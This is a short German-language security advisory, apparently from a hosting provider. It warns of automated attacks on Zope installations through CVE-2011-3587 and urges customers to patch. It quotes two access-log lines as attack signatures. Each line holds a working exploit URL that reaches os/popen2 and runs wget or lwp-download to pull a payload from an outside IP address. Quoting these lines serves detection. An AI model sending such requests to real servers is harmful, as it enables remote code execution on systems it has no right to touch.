Angriffe gegen Zope-Installationen

Wir beobachten seit 26.12.2011 vermehrt Angriffe gegen Zope-Installationen. Insbesondere die Lücke
CVE 2011-3587, für die ein Patch verfügbar ist, wird automatisiert erfolgreich ausgenutzt.

Bitte stellen Sie sicher, dass die von Ihnen gepflegten Zope-Installationen alle Sicherheitspatches enthalten, da gocept keine von Nutzern gepflegten Anwendungen patcht.

Angriffe erzeugen in den Logfiles die folgenden typischen Angriffsmuster:
211.191.168.XXX - - [26/Dec/2011:22:18:00 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/ieh1%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
211.191.168.XXX - - [26/Dec/2011:22:18:01 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=lwp-download%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"